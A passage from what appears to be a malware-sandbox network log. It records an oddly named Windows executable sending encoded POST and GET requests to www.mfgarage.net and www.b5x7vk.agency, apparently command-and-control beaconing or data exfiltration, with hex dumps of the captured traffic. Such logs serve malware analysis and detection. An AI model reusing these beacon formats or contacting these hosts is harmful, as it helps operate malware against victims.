                                                      Data Ascii: k-qSeDlHf-uajsdBk83xuxzeBVkDftYzzScez2NWD2dkSKMh9ie; Domain=.sahibinden.com; Expires=Wed, 11-Sep-2024 09:34:29 GMT; Path=/; Secure; SameSite=Nonevary: User-Agentlocation: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfga
                                                       Sep 11, 2024 11:19:29.857779026 CEST  1236               IN         HTTP/1.1 302 Found
                                                      x-content-type-options: nosniff
                                                      x-frame-options: SAMEORIGIN
                                                      content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                                      pragma: no-cache
                                                      expires: 0
                                                      cache-control: no-cache, no-store, must-revalidate
                                                      set-cookie: vid=7; Domain=.sahibinden.com; Expires=Sat, 11-Sep-2027 09:19:29 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: cdid=QDILqjVcXFmEXOnl66e160a1; Domain=.sahibinden.com; Expires=Sat, 11-Sep-2027 09:19:29 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csss=Z54BQt4A_PQ9yIeu9HlI5qtEAUQqILYJqfxD0LMR38Xp3Uiuz9RmfyuzXf4V719veaGR-SqUX8Z5sttsN5frzQ; Domain=.sahibinden.com; Expires=Wed, 11-Sep-2024 09:49:29 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csls=igcCZUOV_dj1TGeFk3x26bEeocV_uFTw_KcDcRKv3yeigNFoNbGIHI_0uhtXNnVBGQ-0LV2cFh3jtjQp2RJOHA; Domain=.sahibinden.com; Expires=Thu, 11-Sep-2025 09:19:29 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csid=jZdFKFIBuVsFizCwbWtwddbgRfQkCudIJb8K_knhX-dx54Y1L8deSPIr56tXbVKLzm2mJnrmoe4xEl0qn0ycCyK6D5PXhvwWRNe_oAyQBXUqMdavZE2CnXaiUB-xMTf4nX70JFvfO1mvZm6HgxN_RAUiF_HoG5aJUdSzb-SuPd25RVyrTk6qVoENDIWyqsvurUQCVomAnGPOJfhCa5yREQ6p8ePxZeufiQQnBlhQI7neGjthC4YQUKS_XpHC6IcvugkypoDrBj7CAP0owzqXn8id3AxZEkmXJIWKQ1GTsJnfd26x5PsP_WgEUJtvM6BHj_ZLAnWSmDXJ
                                                      Data Raw:
                                                      Data Ascii:


                                                       Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                       34          192.168.2.4  63350        85.153.138.113  80                3496  C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp                             Bytes transferred  Direction  Data
                                                       Sep 11, 2024 11:19:31.292432070 CEST  783                OUT        POST /3lu7/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.mfgarage.net
                                                      Origin: http://www.mfgarage.net
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.mfgarage.net/3lu7/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 71 78 2b 49 63 70 55 41 39 6a 30 70 75 48 51 58 62 44 78 41 35 39 79 45 36 41 48 31 68 61 56 2b 45 4a 54 55 67 76 38 36 34 58 55 58 66 2b 67 62 31 50 67 54 68 59 53 52 66 53 48 70 31 43 4e 7a 4a 70 59 41 78 4c 2b 53 6f 75 45 59 6e 38 6a 6e 4e 52 74 59 54 59 61 6c 54 6c 46 69 52 6e 67 4c 32 58 50 46 56 72 79 72 59 43 49 7a 58 77 73 6b 55 54 4d 36 57 6c 35 5a 47 33 2b 2f 5a 39 36 73 68 36 41 72 4e 33 67 50 44 6e 50 70 58 6b 4b 76 54 47 70 7a 64 2f 46 51 51 78 36 65 4b 5a 49 34 61 56 33 6a 38 7a 41 7a 56 61 58 35 75 77 43 30 47 77 54 58 42 7a 68 72 58 61 37 46 6f 44 2f 76 61 76 38 4d 6c 6a 6b 41 4b 6d 57 44 55 5a 38 64 76 4d 2f 46 64 4d 55 3d
                                                      Data Ascii: pP_8=qx+IcpUA9j0puHQXbDxA59yE6AH1haV+EJTUgv864XUXf+gb1PgThYSRfSHp1CNzJpYAxL+SouEYn8jnNRtYTYalTlFiRngL2XPFVryrYCIzXwskUTM6Wl5ZG3+/Z96sh6ArN3gPDnPpXkKvTGpzd/FQQx6eKZI4aV3j8zAzVaX5uwC0GwTXBzhrXa7FoD/vav8MljkAKmWDUZ8dvM/FdMU=
                                                       Sep 11, 2024 11:19:31.999973059 CEST  1236               IN         HTTP/1.1 302 Found
                                                      x-content-type-options: nosniff
                                                      x-frame-options: SAMEORIGIN
                                                      content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                                      pragma: no-cache
                                                      expires: 0
                                                      cache-control: no-cache, no-store, must-revalidate
                                                      set-cookie: vid=742; Domain=.sahibinden.com; Expires=Sat, 11-Sep-2027 09:19:31 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: cdid=kIyacWYAirgt8oOA66e160a3; Domain=.sahibinden.com; Expires=Sat, 11-Sep-2027 09:19:31 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csss=w6WsFphk9OJzVduKi5_cfZsQ0G8uDEeCmMWFVN52S47jZMNH5QAvW3Zrymy2-x-VDCo6BNaNFXC690ndvNs2fg; Domain=.sahibinden.com; Expires=Wed, 11-Sep-2024 09:49:31 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csls=fKwaOJOSyZaHwH9pIZCwzBb8iqBf7BKzqM5hzKrwsADL2SWMblQLshmCBVaVlOEKylOyqPU4Q_EwbA94zwnLjw; Domain=.sahibinden.com; Expires=Thu, 11-Sep-2025 09:19:31 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csid=a3l_Dz4ouUIFsbfehgj8dO6WdUO0vY6VvI8ACpr2gVWPM2bfi2IUo13OH4_zlh9qE214pUVe-2-egNmferplQ1xnAniSlWOYaxNoyFJHRXvJyzjQ3Kbu-jk5mxoJHQSOVaTZSpsvbaFDkPl4Wd7k1g3sA51QK6eRjSmSp96lENFyf19uje-q0xjD4Y6AY6eSwdg6mWxdY4pPk0stWvjYqI6HuiZizo5A0SLM1vg54YbELCDBe8FXC1sF-j_xuibTDkGaVwPvlBjXADBzeyS7P0Y8nwSGevRTZcnfP91wtC0IdRjjeq7CfhdrooQSSOxz6hVLLEaZIL
                                                      Data Raw:
                                                      Data Ascii:
                                                       Sep 11, 2024 11:19:32.000555038 CEST  407                IN         Data Raw: 42 67 48 5f 62 47 6e 54 31 6b 57 69 5a 69 41 6f 34 6a 34 61 78 6d 50 69 5f 38 61 4f 61 49 57 6d 36 62 59 43 6e 58 68 52 44 67 41 5f 72 36 59 74 47 63 72 66 70 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68 69 62 69 6e 64 65 6e 2e 63 6f 6d 3b 20 45 78 70
                                                      Data Ascii: BgH_bGnT1kWiZiAo4j4axmPi_8aOaIWm6bYCnXhRDgA_r6YtGcrfp; Domain=.sahibinden.com; Expires=Wed, 11-Sep-2024 09:34:31 GMT; Path=/; Secure; SameSite=Nonevary: User-Agentlocation: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mf


                                                       Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                       35          192.168.2.4  63351        85.153.138.113  80                3496  C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp                             Bytes transferred  Direction  Data
                                                       Sep 11, 2024 11:19:33.837366104 CEST  10865              OUT        POST /3lu7/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.mfgarage.net
                                                      Origin: http://www.mfgarage.net
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.mfgarage.net/3lu7/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 71 78 2b 49 63 70 55 41 39 6a 30 70 75 48 51 58 62 44 78 41 35 39 79 45 36 41 48 31 68 61 56 2b 45 4a 54 55 67 76 38 36 34 58 4d 58 66 73 34 62 31 76 63 54 67 59 53 52 57 79 48 71 31 43 4e 71 4a 70 51 45 78 4c 7a 76 6f 71 30 59 68 61 76 6e 4c 67 74 59 5a 59 61 6c 61 46 46 6a 56 6e 67 6b 32 57 2b 4e 56 72 69 72 59 43 49 7a 58 79 30 6b 64 6d 77 36 51 6c 35 65 4f 58 2b 4a 64 39 36 41 68 36 59 52 4e 33 55 78 57 44 7a 70 5a 67 75 76 65 51 39 7a 65 66 46 65 54 78 36 38 4b 5a 45 6e 61 56 72 5a 38 77 63 5a 56 61 6a 35 2b 57 33 31 46 54 37 76 51 7a 70 71 41 4b 33 46 6b 51 50 52 62 2f 38 4e 74 52 51 70 49 69 65 65 65 49 73 54 31 2b 58 7a 43 70 6d 50 4f 33 30 53 4c 44 61 6d 4b 62 54 62 58 46 72 55 50 48 4b 65 76 36 35 4c 70 47 6a 46 41 4c 6f 47 37 37 6f 61 63 62 32 69 38 37 4c 32 6f 64 72 64 53 6a 72 37 4b 38 35 5a 6c 74 62 77 6e 4e 51 76 34 68 70 36 54 51 5a 52 2f 51 71 58 53 48 63 47 63 70 33 30 66 70 6a 74 4c 35 76 48 4e 36 46 2b 65 38 2b 52 76 38 4c 68 44 76 43 53 36 45 4d 48 6c 45 69 4a 71 [TRUNCATED]
                                                       Data Ascii: pP_8=[TRUNCATED]
                                                       Sep 11, 2024 11:19:34.680179119 CEST  1236               IN         HTTP/1.1 302 Found
                                                      x-content-type-options: nosniff
                                                      x-frame-options: SAMEORIGIN
                                                      content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                                      pragma: no-cache
                                                      expires: 0
                                                      cache-control: no-cache, no-store, must-revalidate
                                                      set-cookie: vid=784; Domain=.sahibinden.com; Expires=Sat, 11-Sep-2027 09:19:34 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: cdid=p2J1reMUFHMrLVh166e160a6; Domain=.sahibinden.com; Expires=Sat, 11-Sep-2027 09:19:34 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csss=5X-Rs7sE-vu0e8kQwAvAA-N1Nvc9PnV19l4j_QpLXzcDHPby6BpF4aQLKPL0QqWuZJArjfu4xPnfpQ-AonjMIQ; Domain=.sahibinden.com; Expires=Wed, 11-Sep-2024 09:49:34 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csls=tnbkxRndPT7Qq-RyVzKh46RdXqhfPVq_9gp-EWz059baGh967ws53g67l_W1Fg1ddIHQ-vKbR6s88zqQsgyGTA; Domain=.sahibinden.com; Expires=Thu, 11-Sep-2025 09:19:34 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csid=171dSqHDNUUe_QfIvc3RQnrxruCX9IXFi1yS4eChHWN8UjboNzfuXJo1i0QwEvrn9K4tl5yQxl3brzPNsJutkkwQONjayI_wrwi6qR5vm9ZtfualhmGxhHeCpSA1xNHBnFaWTXZIMyytyz9kz44rwdheug6T3LoQrG8OuC_2tDSGGwMvxwFvK0bm36pWd89XILbAZ__6_NZcIyW1_50Rnkj55As0ljtBVnlf2i939SVRsl27As8YytxbpOWB1xSYLLsJGPAZlKOpKUQYtqwr2Z1krxaauD7vVAHeP03eElPF_0WUur9XhdEac0VZZQm8XU6H78LEBV
                                                      Data Raw:
                                                      Data Ascii:
                                                       Sep 11, 2024 11:19:34.680330038 CEST  406                IN         Data Raw: 70 79 31 32 44 54 39 68 4e 6c 6f 63 58 6d 46 77 45 55 4b 32 49 57 64 4b 2d 31 4f 73 37 71 70 35 48 6e 4a 43 4b 35 45 4b 4b 32 6a 63 50 76 4f 55 6a 59 74 4e 4c 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68 69 62 69 6e 64 65 6e 2e 63 6f 6d 3b 20 45 78 70
                                                      Data Ascii: py12DT9hNlocXmFwEUK2IWdK-1Os7qp5HnJCK5EKK2jcPvOUjYtNL; Domain=.sahibinden.com; Expires=Wed, 11-Sep-2024 09:34:34 GMT; Path=/; Secure; SameSite=Nonevary: User-Agentlocation: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mf


                                                       Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                       36          192.168.2.4  63352        85.153.138.113  80                3496  C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp                             Bytes transferred  Direction  Data
                                                       Sep 11, 2024 11:19:36.377923965 CEST  499                OUT        GET /3lu7/?pP_8=nzWofdhWpyQTuQkDfxpOhZSR2SP28ZN4SJ26h7kwykQFM8AQx5IfrLSrYivs6QFJHI8FrKvcoPkOi5L1XFRCLbCiXi5UAF8H0knLfKrCbz8tBFYRfGccZ0A=&V0Qh=4pBta8 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.mfgarage.net
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                       Sep 11, 2024 11:19:37.159225941 CEST  1236               IN         HTTP/1.1 302 Found
                                                      x-content-type-options: nosniff
                                                      x-frame-options: SAMEORIGIN
                                                      content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                                      pragma: no-cache
                                                      expires: 0
                                                      cache-control: no-cache, no-store, must-revalidate
                                                      set-cookie: vid=969; Domain=.sahibinden.com; Expires=Sat, 11-Sep-2027 09:19:37 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: cdid=vbrAm6JgxxWIY4c266e160a9; Domain=.sahibinden.com; Expires=Sat, 11-Sep-2027 09:19:37 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csss=3VnBvPwreAgHcqpBf4plQWsouJIG7YQ-cZdP0knthwRKHA93c1Kh9Fd195HdPNRpU9icFYpLgxpGjBaf39RBiA; Domain=.sahibinden.com; Expires=Wed, 11-Sep-2024 09:49:37 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csls=1QX2ysecUluM4Nd-DFVomhV_IraIe3rwA-JOcsdx--yLCoDNcMQ7etSNxCcOCfaIsAl16Ox_IV4MMs1RYeN4eg; Domain=.sahibinden.com; Expires=Thu, 11-Sep-2025 09:19:37 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csid=bBr7MjBxl7RAxeLYzzlB-daF2BBJYPsZaPilYggYh6fBv2LiqH5NC68GMRuX1CTkO0ameNHjRb-YGYgzMVFd7Q3LRg5hNaW53ZUufhAi3aUEhsnds1JzpG4ttJabTjEIqAakLLP9OFhleQLIcYCC0BPpBsY2LRZr8Mo7Si72g_uf-2UDHx51UlPNTM8W-hx771As7apiswjmuVzd5gxaiC3DowIdf70hErDFzk5bVVEjYgadSq3AruaChaPif5qN1oBybl2LM0UHqcQSu_WMWEs5Oou8cRZyl03IpKyTWQmS-rZVpb7sxFFxdFPHoDJ7lz9lC0D6mJ
                                                      Data Raw:
                                                      Data Ascii:
                                                       Sep 11, 2024 11:19:37.159240007 CEST  555                IN         Data Raw: 77 36 41 4f 62 31 43 70 66 59 35 51 59 31 47 43 6d 62 79 72 48 5a 4e 6c 68 57 68 62 62 6e 48 48 75 37 51 46 50 34 73 72 48 6a 47 58 5a 6d 73 54 4a 46 75 47 45 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68 69 62 69 6e 64 65 6e 2e 63 6f 6d 3b 20 45 78 70
                                                      Data Ascii: w6AOb1CpfY5QY1GCmbyrHZNlhWhbbnHHu7QFP4srHjGXZmsTJFuGE; Domain=.sahibinden.com; Expires=Wed, 11-Sep-2024 09:34:37 GMT; Path=/; Secure; SameSite=Nonevary: User-Agentlocation: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mf


                                                       Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                       37          192.168.2.4  63353        104.21.11.31    80                3496  C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp                             Bytes transferred  Direction  Data
                                                       Sep 11, 2024 11:19:42.325709105 CEST  766                OUT        POST /zznj/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.b5x7vk.agency
                                                      Origin: http://www.b5x7vk.agency
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.b5x7vk.agency/zznj/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 61 50 58 36 63 68 65 4c 6d 4f 73 63 6d 6c 34 53 35 37 43 2b 76 61 6b 7a 7a 52 77 7a 54 4f 35 6e 36 49 54 37 69 37 54 54 76 52 69 52 42 69 7a 36 79 5a 4f 44 66 38 45 4f 79 31 37 34 48 72 78 71 50 58 38 66 32 41 50 6e 72 2b 33 4d 4f 54 41 45 4b 71 32 71 55 32 32 45 30 6c 62 72 69 69 34 56 37 61 43 6f 4a 4e 38 47 37 51 71 57 5a 42 6c 58 36 68 53 4c 6a 67 56 34 54 35 58 65 69 57 4f 62 76 30 57 64 59 6f 67 59 36 52 52 62 30 6a 35 61 6b 36 53 75 4d 55 2b 38 53 34 49 64 32 53 6f 57 44 54 62 69 2f 59 6c 4f 4c 53 51 5a 39 2f 33 4c 78 53 72 2f 43 47 74 69 44 61 72 7a 4b 73 73 50 46 51 3d 3d
                                                      Data Ascii: pP_8=aPX6cheLmOscml4S57C+vakzzRwzTO5n6IT7i7TTvRiRBiz6yZODf8EOy174HrxqPX8f2APnr+3MOTAEKq2qU22E0lbrii4V7aCoJN8G7QqWZBlX6hSLjgV4T5XeiWObv0WdYogY6RRb0j5ak6SuMU+8S4Id2SoWDTbi/YlOLSQZ9/3LxSr/CGtiDarzKssPFQ==
                                                       Sep 11, 2024 11:19:43.317822933 CEST  774                IN         HTTP/1.1 404 Not Found
                                                      Date: Wed, 11 Sep 2024 09:19:43 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l232qS49SdojLUekuh%2FJBVEjw2nt63OCqRz4Y1IEYZLsUAryQX2p45V0WS6iFd5wW%2Bs5fmMZCy1FrxZqmyW9FkT1PHNJCtOwHflCZbxOizhzjWz%2Fue7aDglh0VWz9Vy7dya7Lg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8c1693e40ae472a7-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                       Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                       38          192.168.2.4  63354        104.21.11.31    80                3496  C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp                             Bytes transferred  Direction  Data
                                                       Sep 11, 2024 11:19:44.862307072 CEST  786                OUT        POST /zznj/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.b5x7vk.agency
                                                      Origin: http://www.b5x7vk.agency
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.b5x7vk.agency/zznj/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 61 50 58 36 63 68 65 4c 6d 4f 73 63 30 57 51 53 34 63 32 2b 37 4b 6b 77 38 78 77 7a 49 65 35 6a 36 50 62 37 69 36 6e 44 76 44 32 52 42 48 50 36 78 62 6d 44 4d 4d 45 4f 35 56 36 7a 5a 62 77 6b 50 58 77 39 32 46 50 6e 72 2b 54 4d 4f 54 77 45 4a 5a 75 70 55 6d 32 38 2f 46 62 74 73 43 34 56 37 61 43 6f 4a 4e 6f 67 37 51 43 57 59 78 31 58 37 43 4b 49 67 67 56 37 53 35 58 65 6d 57 4f 66 76 30 57 2f 59 6f 52 51 36 55 64 62 30 6a 4a 61 6b 50 75 74 58 6b 2b 36 4e 6f 4a 43 78 78 64 50 61 78 36 65 35 5a 35 75 44 6a 73 31 38 35 6d 52 67 6a 4b 6f 51 47 4a 52 65 64 69 48 48 76 52 47 65 64 79 65 58 68 34 42 50 68 33 36 48 5a 67 69 39 4f 39 78 7a 56 49 3d
                                                      Data Ascii: pP_8=aPX6cheLmOsc0WQS4c2+7Kkw8xwzIe5j6Pb7i6nDvD2RBHP6xbmDMMEO5V6zZbwkPXw92FPnr+TMOTwEJZupUm28/FbtsC4V7aCoJNog7QCWYx1X7CKIggV7S5XemWOfv0W/YoRQ6Udb0jJakPutXk+6NoJCxxdPax6e5Z5uDjs185mRgjKoQGJRediHHvRGedyeXh4BPh36HZgi9O9xzVI=
                                                      Sep 11, 2024 11:19:45.850116968 CEST | 778 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 11 Sep 2024 09:19:45 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jsvWIlM4trV5Y%2BZqVpfvd%2FhHbUYPy9y4ovQoz47zHx%2FrfYcn4NnWtAG8HNJhcRZciluubY22hcNb2bC55%2F4JMWfdr2BecV%2FZR1XSBM9IqVWxxfcNgfAvZFRqKbTFqbXKyxn4NQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8c1693f3df4a0f4a-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      39 | 192.168.2.4 | 63355 | 104.21.11.31 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 11, 2024 11:19:47.407268047 CEST | 10868 | OUT | POST /zznj/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.b5x7vk.agency
                                                      Origin: http://www.b5x7vk.agency
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.b5x7vk.agency/zznj/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 61 50 58 36 63 68 65 4c 6d 4f 73 63 30 57 51 53 34 63 32 2b 37 4b 6b 77 38 78 77 7a 49 65 35 6a 36 50 62 37 69 36 6e 44 76 44 4f 52 42 31 58 36 79 36 6d 44 50 4d 45 4f 36 56 36 77 5a 62 78 34 50 58 6f 35 32 46 4c 33 72 38 37 4d 49 77 34 45 65 59 75 70 62 6d 32 38 77 6c 62 73 69 69 34 36 37 61 53 73 4a 4e 34 67 37 51 43 57 59 33 35 58 38 52 53 49 76 41 56 34 54 35 58 61 69 57 4f 6e 76 30 50 41 59 73 4d 79 35 67 68 62 7a 44 5a 61 33 4a 36 74 62 6b 2b 34 4d 6f 4a 4b 78 78 42 71 61 78 58 76 35 5a 64 49 44 6a 49 31 38 4e 37 6f 6e 41 61 53 4f 47 52 33 43 71 36 34 41 50 78 4c 51 74 47 47 59 52 51 68 61 52 2f 69 50 34 46 41 6e 37 70 4f 73 78 6c 4b 62 2b 57 71 4e 4d 4f 6c 70 65 55 4f 46 4f 77 2b 49 69 74 45 46 68 4f 6d 48 4d 6f 74 2f 67 52 69 51 6c 4a 4e 59 75 52 63 75 74 73 30 52 64 59 4a 53 5a 77 35 53 31 2b 6d 57 6c 46 58 49 7a 41 36 2f 76 2f 59 54 56 6d 43 30 54 67 5a 48 68 58 48 41 63 63 49 55 35 67 51 4c 33 6d 75 63 4f 50 6a 38 30 73 42 6f 68 4c 46 62 6c 66 61 6d 35 69 30 78 4b 78 78 68 [TRUNCATED]
                                                      Data Ascii: pP_8= [TRUNCATED]
                                                      Sep 11, 2024 11:19:48.377228975 CEST | 782 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 11 Sep 2024 09:19:48 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F2xuLr1TuQ2KLuTF5lPOxB6q4WsqGUKepN5i%2Bre9rDvTrJ%2F%2B%2B7P6vBkiuL0irh%2Bfg5oTzBo%2BsyZIuBRariB4JmadAGwvx5ZZqUUdwdv3eblw4wuC8zvaYLoolDJBln2VpuJMGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8c169403db5142f2-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
